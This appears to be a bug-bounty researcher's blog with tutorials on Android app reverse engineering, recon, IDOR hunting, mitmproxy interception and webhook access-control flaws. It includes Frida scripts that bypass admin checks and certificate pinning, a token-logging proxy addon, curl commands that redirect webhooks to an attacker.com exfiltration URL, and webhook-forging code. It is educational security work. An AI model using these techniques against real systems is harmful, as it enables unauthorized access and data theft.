
i'm a product security engineer at mindbody/classpass. day to day i work on security pipelines, automation, secret scanning, our responsible disclosure program, occasional pentests, and ai-powered triage of tool findings.

into appsec, supply chain security, bug bounty, and security research. i like breaking things to understand how they work.

16 cves published. acknowledged by apple, microsoft, and the u.s. department of health and human services.

some of my cves
CVE-2026-34153: rce via localfilevolume fs_path injection (critical)
CVE-2026-34152: command injection via newline in deployment commands (critical)
CVE-2026-31943: ssrf protection bypass via ipv4-mapped ipv6 (high)
GHSA-hg2c-wm3r-f7xx: ssrf via missing rfc 6598 range in ip validation (high)
CVE-2026-33655: ssrf bypass via unresolved hostname in notification urls (high)
CVE-2026-40172: privilege escalation via superuser group assignment (high)
GHSA-r745-8hwv: unauth oauth2 refresh — non-blind ssrf + secret exfil (high)
CVE-2026-32695: ingress rule injection — host restriction bypass (medium)

reverse engineering android apps with jadx + frida

apr 10, 2026 · 5 min read

most android apps trust the client way too much. hidden endpoints, hardcoded keys, debug flags left in production. all you need is the right toolchain to find them.

the approach is simple: jadx for static analysis, frida for runtime hooking. one shows you the code, the other lets you mess with it while it runs.

start by pulling the apk and throwing it into jadx:

$ adb shell pm path com.target.app
# package:/data/app/com.target.app/base.apk
$ adb pull /data/app/com.target.app/base.apk
$ jadx -d output/ base.apk

look for api endpoints, auth logic, anything interesting. grep is your friend here. search for strings like /api/, Authorization, Bearer, secret.

$ grep -rni "api" output/sources/ | head -20
$ grep -rni "secret\|key\|token" output/sources/

once you find something interesting, hook it with frida to see what's happening at runtime. say you found an isAdmin() check:

// bypass.js
Java.perform(function() {
  var auth = Java.use("com.target.app.AuthManager");
  auth.isAdmin.implementation = function() {
    console.log("[+] isAdmin() called, returning true");
    return true;
  };
});

$ frida -U -f com.target.app -l bypass.js
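if you'd rather drive this from python than the cli, frida's python bindings can load the same hook. the builder below just templates the bypass above; `run_on_device` needs a usb device running frida-server, so it's defined but not called here:

```python
def build_bool_hook(java_class: str, method: str, value: str = "true") -> str:
    """generate a frida hook that forces a boolean method to return `value`."""
    return f'''
Java.perform(function() {{
  var cls = Java.use("{java_class}");
  cls.{method}.implementation = function() {{
    console.log("[+] {method}() forced to {value}");
    return {value};
  }};
}});
'''

script_src = build_bool_hook("com.target.app.AuthManager", "isAdmin")

def run_on_device(package: str, src: str):
    # requires `pip install frida` and frida-server on a usb-connected device,
    # so this function is only a sketch and isn't executed here
    import frida
    device = frida.get_usb_device()
    pid = device.spawn([package])
    session = device.attach(pid)
    session.create_script(src).load()
    device.resume(pid)
```

same effect as the cli invocation, but you can loop it over many classes and methods from one script.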

certificate pinning? most apps use okhttp or a custom trust manager. the idea is simple — the app validates the server's certificate against a pinned hash. if it doesn't match, the connection drops. but since we control the runtime, we just hook the check and make it always pass.

for okhttp-based pinning, the target is usually CertificatePinner.check():

// ssl_bypass.js
Java.perform(function() {
  var CertPinner = Java.use("okhttp3.CertificatePinner");
  CertPinner.check.overload(
    "java.lang.String",
    "java.util.List"
  ).implementation = function(hostname, peerCerts) {
    console.log("[+] bypassing pin for: " + hostname);
    return;
  };
});

for apps using a custom TrustManager, you need to find the class that implements X509TrustManager and hook checkServerTrusted():

// trustmanager_bypass.js
Java.perform(function() {
  var tm = Java.use("com.target.app.CustomTrustManager");
  tm.checkServerTrusted.implementation = function(chain, authType) {
    console.log("[+] trusting all certs");
    return;
  };
});

run it the same way:

$ frida -U -f com.target.app -l ssl_bypass.js

now all traffic flows through your proxy. point the device to burp, and you're intercepting every request the app makes — auth tokens, api calls, everything.

one thing to watch out for: some apps stack multiple pinning layers. you might bypass okhttp but still get blocked by a native check. in that case, look for libssl hooks or use something like objection which covers most common cases out of the box.

the real value isn't in any single trick. it's in chaining static findings with dynamic confirmation. jadx tells you what the code could do. frida tells you what it actually does.


the first 30 minutes on a new target

apr 13, 2026 · 5 min read

when i open a new program, i don't start running tools. i start understanding what the app does.

i sign up, create an account, and use it like a normal user. burp is capturing everything in the background, but i'm not looking at burp yet — i'm looking at the app.

what i'm looking for:

where are the IDs? — every time i see a number or uuid in a url, a request, a response, i take note. /api/org/123/members — that's getting tested later.

what's the permission model? — roles? admin/member/viewer? orgs, teams, projects? the more layers, the higher the chance someone forgot a check somewhere.

what's "mine" vs "theirs"? — if i can see my profile at /users/me, does /users/123 exist? if i can list my projects, can i list another org's?

features that look new — changelogs, product blogs, "new!" badges in the UI. new feature = new code = less tested.

features that look forgotten — export, webhook config, api keys page, advanced settings. nobody tests what nobody uses.

integrations — oauth, webhooks, api tokens, sso. every integration is a new attack surface with its own auth.

after 30 minutes i have a mental list of where to attack. then i open burp, look at the sitemap, and go endpoint by endpoint.

here's the thing most people miss though: don't just test the endpoints you see. read the javascript. apps ship their entire api client in the bundle — routes the UI doesn't use yet, admin endpoints behind feature flags, internal debug paths that never got removed. i've found more bugs in endpoints hidden in js bundles than in anything the app actually exposes in the UI.

pull every js file. search for /api/, fetch(, axios., endpoint, admin, internal. build a list of every route the app knows about, not just the ones it shows you. then test those with your low-priv account. that gap — between what the frontend knows and what the frontend shows — is where the best bugs live.
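that route-harvesting step is easy to script. a rough python sketch of the same grep; the regex and the sample bundle are illustrative, not from any real app:

```python
import re

# pull every route-looking string out of a js bundle; mirrors the manual
# search above (/api/ paths inside quoted strings)
ROUTE_RE = re.compile(r'["\'](/api/[A-Za-z0-9_/.:-]*)["\']')

def extract_routes(js_source: str) -> list[str]:
    """return a sorted, deduplicated list of api paths found in one bundle."""
    return sorted(set(ROUTE_RE.findall(js_source)))

bundle = '''
    fetch("/api/v1/users/me");
    axios.post("/api/v1/admin/feature-flags", body);
    const LEGACY = "/api/internal/debug";
'''
routes = extract_routes(bundle)
# every path the frontend knows about, shown in the ui or not
```

run it over every downloaded bundle and diff the result against the routes you actually saw in burp. the difference is your test queue.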

most bugs i've found didn't come from automated scanning. they came from understanding the app better than whoever tested it before me.


finding idors at scale

apr 03, 2026 · 7 min read

idor — insecure direct object reference. it's been on the owasp top 10 for years (these days folded into broken access control) and it's still everywhere. the concept is almost embarrassingly simple: change an id in a request, get someone else's data. and yet it remains one of the most rewarding bug classes to hunt for.

i think the reason it persists is that it's not really a coding mistake. it's an architecture mistake. developers build features around objects — users, orders, documents — and forget to ask the most basic question: does this person have permission to access this specific object?

the mindset

the first thing to understand is that idor isn't just "change the id and see what happens." that's the mechanic, not the methodology. the real skill is understanding how the application models ownership and access.

every app has a hierarchy. users belong to organizations. orders belong to users. documents belong to projects. the question is always: where does the app check that chain of ownership, and where does it skip?

most apps get the obvious ones right. /api/users/123/profile probably checks if you're user 123. but what about /api/users/123/invoices? or /api/users/123/api-keys? the deeper you go into the object graph, the more likely someone forgot a check.

the two-account approach

always test with two accounts. always. you can't find access control bugs with a single session. create account A (the victim) and account B (the attacker). use the app fully as account A — create data, upload files, configure settings. then try to access all of it as account B.

this sounds obvious but most people skip it because it's tedious. setting up two accounts with realistic data takes time. but it's the foundation of every idor you'll ever find.
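the tedious part is mechanical, so i script it. a minimal sketch of the two-account loop: collect the resource urls account A created, replay each with account B's token, and flag anything that comes back. `fetch` stands in for whatever http client you use, and the fake backend below is purely illustrative:

```python
def find_idor_candidates(victim_urls, attacker_token, fetch):
    """replay the victim's resource urls with the attacker's token;
    `fetch` must return (status_code, body)."""
    candidates = []
    for url in victim_urls:
        status, body = fetch(url, attacker_token)
        if status == 200 and body:  # attacker read the victim's object
            candidates.append(url)
    return candidates

# fake backend for illustration: the invoices endpoint forgot its check
def fake_fetch(url, token):
    if "invoices" in url:
        return 200, {"amount": 120}   # missing ownership check
    return 403, None

urls = ["/api/users/1001/profile", "/api/users/1001/invoices"]
leaks = find_idor_candidates(urls, "token-B", fake_fetch)
# leaks == ["/api/users/1001/invoices"]
```

in practice you'd also compare response bodies, since some apps return 200 with an empty or redacted object. but the skeleton is the same.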

where to look

after testing hundreds of apps, these are the places where idors show up most consistently:

api endpoints that accept an id you didn't choose. if you're making a request and the id came from a url, a dropdown, a hidden field, or a previous api response — that's a candidate. the app gave you that id, but does it verify you should have it?

export and download features. generating a pdf report, exporting csv data, downloading an attachment. these are often built as separate services that receive an object id and return the file. the auth check happens in the main app, but the export service just trusts the id it receives.

notification and activity endpoints. "get my recent activity" or "get my notifications" often leak data because they aggregate from multiple sources. the aggregation layer might not enforce the same permissions as each individual source.

admin and settings endpoints. changing org settings, managing team members, updating billing info. these are high-value targets because the impact of unauthorized access is severe. and they're often less tested because fewer people use them.

graphql. it makes idor testing interesting because the client controls the query structure. you can ask for nested relationships — "give me this project's organization's other projects" — and find paths the developers never intended to expose.

the uuid trap

a lot of developers think using uuids instead of sequential ids prevents idor. it doesn't. uuids make enumeration harder, but they don't solve the access control problem. if i can get your uuid from anywhere — a shared link, an api response, a websocket message, an email — i can still use it.

places uuids leak constantly: invitation links, public profiles, shared documents, api list endpoints, error messages, and javascript source files. once you have one valid uuid, you can test every endpoint that accepts it.
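harvesting those leaked uuids is scriptable too. a small sketch (the shared-link line is made up):

```python
import re

# uuids leak everywhere; harvest them from anything you collect
# (responses, js files, emails) and feed them back into endpoint tests
UUID_RE = re.compile(
    r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-"
    r"[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
)

def harvest_uuids(text: str) -> set[str]:
    """extract every uuid from a blob of text, normalized to lowercase."""
    return {u.lower() for u in UUID_RE.findall(text)}

leaked = harvest_uuids(
    'GET /share/3FA85F64-5717-4562-B3FC-2C963F66AFA6 -> {"doc": "q3 report"}'
)
# leaked == {"3fa85f64-5717-4562-b3fc-2c963f66afa6"}
```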

beyond read access

here's what separates a medium finding from a critical one: don't stop at reading data. test write and delete operations too.

can account B modify account A's profile? update their email address? change their password? that's account takeover through idor — critical severity.

can account B delete account A's projects? remove their team members? cancel their subscription? that's destructive idor — also critical.

most hunters stop at "i can see another user's data." that's valid, but the real impact comes from testing what else you can do with that access.

the subtle ones

the best idors aren't obvious. they hide in features you wouldn't think to test:

— search endpoints that accept a scope or org_id filter and return results from that scope without checking membership
— webhook configurations where you can point someone else's events to your url
— file upload endpoints where the parent_id determines which project the file lands in
— sso and saml flows where the account_id in the assertion isn't validated against the authenticated session
— api key management where you can list or revoke keys belonging to another user

these are the findings that make programs pay attention. not because they're technically complex, but because they show a deep understanding of how the application works.

writing the report

when you find an idor, the report matters as much as the finding. always include: what you accessed, whose data it was, and what an attacker could do with it. don't just say "i changed the id and got a 200." explain the business impact. "an attacker can read any customer's invoices, including billing addresses, payment amounts, and line items" hits different than "idor on /api/invoices/:id."

idor isn't going away. as long as apps have objects and users, there will be missing access checks. the hunters who find them consistently aren't the ones with the best tools — they're the ones who understand the application deeply enough to know where to look.


my recon methodology: from scope to first bug

mar 22, 2026 · 10 min read

recon is the part that separates finding one bug from finding ten. most people jump straight into testing — i spend the first hours just mapping the target. the more surface you uncover, the more entry points you have.

here's the exact workflow i follow when i start a new program.

1. subdomain enumeration

start wide. pull subdomains from as many sources as possible and merge them:

# passive enum from multiple sources
$ subfinder -d target.com -o subs_subfinder.txt
$ amass enum -passive -d target.com -o subs_amass.txt
$ github-subdomains -d target.com -t GITHUB_TOKEN -o subs_github.txt

# merge and deduplicate
$ cat subs_*.txt | sort -u > all_subs.txt
$ wc -l all_subs.txt
# 847 unique subdomains

don't skip github dorking. you'd be surprised how many internal subdomains, staging environments, and api endpoints show up in public repos.

2. probing live hosts

not all subdomains resolve. filter for what's actually alive:

$ cat all_subs.txt | httpx -silent -status-code -title -tech-detect \
  -o live_hosts.txt

# quick look at what we're dealing with
$ cat live_hosts.txt | grep "\[200\]" | wc -l
# 312 live hosts returning 200

httpx with -tech-detect is key — it tells you what stack each host runs. react frontend? spring backend? nginx? knowing the tech narrows your attack surface immediately.
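i usually parse that annotated output into something i can sort and filter. a sketch that assumes httpx's default `url [status] [title] [tech]` line shape — check your version's output format before trusting the regex:

```python
import re

# example line:  https://app.target.com [200] [Dashboard] [React,Nginx]
LINE_RE = re.compile(r"^(\S+) \[(\d{3})\] \[([^\]]*)\] \[([^\]]*)\]")

def parse_httpx(line: str):
    """parse one annotated httpx line into a dict, or None if it doesn't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url, status, title, tech = m.groups()
    return {"url": url, "status": int(status),
            "title": title, "tech": tech.split(",") if tech else []}

host = parse_httpx("https://app.target.com [200] [Dashboard] [React,Nginx]")
# host["tech"] == ["React", "Nginx"]
```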

3. javascript analysis

js files are a goldmine. they leak api endpoints, internal paths, tokens, and sometimes entire api schemas. pull them all and grep:

# extract js urls from live hosts (strip httpx's annotation columns first)
$ awk '{print $1}' live_hosts.txt | getJS --complete | sort -u > js_files.txt

# download them all
$ cat js_files.txt | xargs -P 10 -I{} wget -q {} -P js_downloads/

# hunt for endpoints
$ grep -rhoP '"/api/[a-zA-Z0-9_/]+"' js_downloads/ | sort -u
# /api/v1/users
# /api/v1/admin/settings
# /api/internal/debug
# /api/v2/webhooks

/api/internal/debug — that shouldn't be there. those are the findings that make recon worth it.

also look for hardcoded keys and secrets:

$ grep -rniE "(api_key|apikey|secret|token|password|aws_)" js_downloads/
$ nuclei -l js_files.txt -t exposures/tokens/

4. api discovery

with the endpoints from js analysis, start building an api map. i usually check for openapi/swagger docs first:

# common swagger/openapi paths
$ awk '{print $1}' live_hosts.txt | while read -r host; do
  for path in /swagger.json /openapi.json /api-docs /swagger-ui/ /docs; do
    code=$(curl -so /dev/null -w "%{http_code}" "$host$path")
    if [ "$code" != "404" ]; then
      echo "$host$path [$code]"
    fi
  done
done

finding a swagger doc is like finding the map to the treasure. every endpoint, every parameter, every model — documented.
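and once you have the doc, flattening it into a hit list is a few lines of python. a sketch over the standard openapi `paths` structure (the sample spec here is made up):

```python
def endpoints_from_openapi(spec: dict) -> list[tuple[str, str]]:
    """flatten an openapi/swagger spec into (METHOD, path) pairs."""
    out = []
    for path, ops in spec.get("paths", {}).items():
        for method in ops:
            if method.lower() in {"get", "post", "put", "patch", "delete"}:
                out.append((method.upper(), path))
    return sorted(out)

spec = {
    "paths": {
        "/users/{id}": {"get": {}, "delete": {}},
        "/admin/settings": {"put": {}},
    }
}
targets = endpoints_from_openapi(spec)
# one (method, path) pair per documented operation, ready to feed a tester
```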

5. nuclei scan

once you have your live hosts, run nuclei for quick wins:

$ nuclei -l live_hosts.txt \
  -t cves/ \
  -t vulnerabilities/ \
  -t exposures/ \
  -t misconfiguration/ \
  -severity medium,high,critical \
  -o nuclei_results.txt

don't rely on nuclei alone — it catches known issues, not logic bugs. but it's a good first pass that can surface easy wins while you focus on manual testing.

6. prioritize

by now you have hundreds of hosts, endpoints, and js findings. the trick is knowing where to dig first:

— staging/dev environments often have weaker auth
— admin panels exposed to the internet
— api endpoints found in js but not in public docs
— anything with internal, debug, or legacy in the path
— endpoints that accept org_id, user_id, or account_id params

that last one is where most of my idor and bac findings come from. if an endpoint takes an id as input and returns data, test it with a different user's id. simple, effective, and still one of the most common bug classes out there.
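i encode that triage as a rough scoring function so i can sort instead of eyeball. the keyword weights below are my own guesses, tune them per target:

```python
# weights for "interesting" path fragments and id-style query params
HOT_WORDS = {"internal": 5, "debug": 5, "legacy": 4, "admin": 4,
             "staging": 3, "dev": 3}
ID_PARAMS = ("org_id", "user_id", "account_id")

def priority(url: str) -> int:
    """higher score = dig here first."""
    u = url.lower()
    score = sum(w for word, w in HOT_WORDS.items() if word in u)
    score += 4 * sum(p in u for p in ID_PARAMS)
    return score

urls = [
    "https://app.target.com/api/v1/health",
    "https://staging.target.com/api/internal/debug",
    "https://app.target.com/api/export?org_id=1",
]
ranked = sorted(urls, key=priority, reverse=True)
# ranked[0] == "https://staging.target.com/api/internal/debug"
```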

recon isn't glamorous. it's running tools, reading output, connecting dots. but every serious bug i've found started with a good recon session. skip it and you're testing blind.


mitmproxy setup for mobile interception

mar 01, 2026 · 4 min read

intercepting mobile app traffic is the first step in any mobile bug bounty engagement. mitmproxy is my go-to — it's free, scriptable, and works on both android and ios. here's the setup i use every time.

install it:

$ pip install mitmproxy
$ mitmproxy --version

start the proxy. by default it runs on port 8080:

$ mitmproxy -p 8080

now configure your device to use the proxy. your laptop and phone need to be on the same network. find your local ip:

$ ifconfig | grep "inet " | grep -v 127.0.0.1
# inet 192.168.1.42 ...

on your phone, go to wifi settings, set the proxy to manual, enter your ip and port 8080. open a browser and navigate to mitm.it — this page serves the mitmproxy CA certificate.

download and install the cert. on android, this gets you user-level interception which works for most browser traffic. but apps targeting api 24+ only trust system-level certs by default.

to install as a system cert on a rooted android device:

# copy the cert from ~/.mitmproxy/
$ hashed_name=$(openssl x509 -inform PEM \
  -subject_hash_old \
  -in ~/.mitmproxy/mitmproxy-ca-cert.cer \
  | head -1)

$ cp ~/.mitmproxy/mitmproxy-ca-cert.cer $hashed_name.0

# push to device system cert store
$ adb root
$ adb remount
$ adb push $hashed_name.0 /system/etc/security/cacerts/
$ adb shell chmod 644 /system/etc/security/cacerts/$hashed_name.0
$ adb reboot

after reboot, mitmproxy's cert is trusted at the system level. apps that don't implement certificate pinning will now send all traffic through your proxy — no complaints.

for apps that do implement pinning, you'll need frida to bypass it (covered in the jadx + frida post). but the proxy setup stays the same.

some useful mitmproxy flags i use constantly:

# only intercept specific domains
$ mitmproxy --set intercept="~d api.target.com"

# dump traffic to a file for later analysis
$ mitmdump -w traffic.flow

# replay saved traffic
$ mitmdump -r traffic.flow

# run with a custom script (e.g. log all auth tokens)
$ mitmproxy -s log_tokens.py

speaking of scripts — mitmproxy's python api is where it gets really powerful. here's a quick addon that logs every authorization header it sees:

# log_tokens.py
from mitmproxy import http

def request(flow: http.HTTPFlow):
    auth = flow.request.headers.get("Authorization")
    if auth:
        print(f"[+] {flow.request.url}")
        print(f"    Token: {auth}")

run it and every request with an auth header gets logged. useful for understanding how an app handles sessions, token refresh, and multi-account flows.
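a lot of those bearer tokens are jwts, and the payload half is readable without any key — it's just base64url-encoded json. a small sketch (the sample token is constructed inline, not a real one):

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """decode a jwt's payload without verifying the signature --
    fine for reading claims, useless as an auth check."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# build an illustrative token with payload {"sub": "1001", "role": "viewer"}
header = base64.urlsafe_b64encode(b'{"alg":"HS256"}').decode().rstrip("=")
body = base64.urlsafe_b64encode(b'{"sub":"1001","role":"viewer"}').decode().rstrip("=")
claims = jwt_claims(f"{header}.{body}.fakesig")
# claims["role"] == "viewer"
```

seeing the role, org, and expiry claims up front tells you a lot about what the backend might be trusting the token for.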

that's the core setup. proxy running, cert installed, traffic flowing. from here you can start mapping endpoints, fuzzing parameters, and looking for the real bugs.


broken access control in webhook implementations

mar 15, 2026 · 6 min read

webhooks are one of the most overlooked features in web apps. they're usually built late in the development cycle, bolted onto an existing api, and rarely get the same access control scrutiny as the core product. that makes them a goldmine for bac bugs.

the core question is simple: can a low-privileged user create, read, update, or delete webhooks that belong to another user or organization?

start by mapping the webhook api. most implementations follow a predictable pattern:

POST   /api/webhooks          # create
GET    /api/webhooks          # list
GET    /api/webhooks/:id      # read
PUT    /api/webhooks/:id      # update
DELETE /api/webhooks/:id      # delete

create two accounts — one admin, one low-priv. use burp to capture every webhook request from the admin account. then replay each one swapping in the low-priv token.

# create a webhook as low-priv user targeting admin's org
$ curl -X POST https://target.com/api/webhooks \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://attacker.com/hook",
    "events": ["payment.completed"],
    "org_id": "ADMIN_ORG_ID"
  }'

if that returns 201, you just created a webhook in someone else's organization. every time a payment completes, the data goes to your server. that's a critical finding.

but don't stop at create. test every operation independently — they often have different auth checks:

# list another org's webhooks
$ curl -s https://target.com/api/webhooks?org_id=ADMIN_ORG_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" | jq .

# read a specific webhook's config (leaks the destination url)
$ curl -s https://target.com/api/webhooks/WEBHOOK_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" | jq .

# update: redirect an existing webhook to attacker-controlled url
$ curl -X PUT https://target.com/api/webhooks/WEBHOOK_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN" \
  -d '{"url": "https://attacker.com/exfil"}'

# delete: disrupt monitoring/integrations
$ curl -X DELETE https://target.com/api/webhooks/WEBHOOK_ID \
  -H "Authorization: Bearer LOW_PRIV_TOKEN"

the most common patterns i've seen:

create is checked, but update isn't — so you can't make a new webhook in their org, but you can hijack an existing one by changing the destination url. silent data exfiltration.

list and read are often wide open — leaking webhook configs, secrets, and destination urls. even if you can't modify anything, knowing where their data flows is valuable intel.

delete is sometimes unprotected — an attacker could silently break an org's integrations. subtle denial of service that's hard to debug.

another thing to check: webhook secrets. some apps include a signing secret in the response body when you create or read a webhook:

{
  "id": "wh_123",
  "url": "https://customer.com/hook",
  "secret": "whsec_a1b2c3d4e5f6",
  "events": ["payment.completed"]
}

if a low-priv user can read that secret, they can forge webhook payloads and trick the receiving server into processing fake events. that's a whole different class of attack.
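forging an event with a leaked secret is one hmac call. signing schemes vary by vendor; hex hmac-sha256 over the raw body is a common pattern, and that's what this sketch assumes (the header name and secret are illustrative):

```python
import hashlib
import hmac
import json

def sign_payload(secret: str, body: bytes) -> str:
    """compute the hex hmac-sha256 signature a receiver would expect
    (assuming a stripe-style raw-body signing scheme)."""
    return hmac.new(secret.encode(), body, hashlib.sha256).hexdigest()

body = json.dumps({"event": "payment.completed", "amount": 9999}).encode()
signature = sign_payload("whsec_a1b2c3d4e5f6", body)
# send `body` with the signature in whatever header the receiver checks
# (e.g. X-Signature) and a server trusting this secret processes the fake event
```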

the fix is straightforward but rarely implemented correctly: every webhook operation should validate that the requesting user has the right role in the target organization. not just auth — authorization. most apps check the first, skip the second.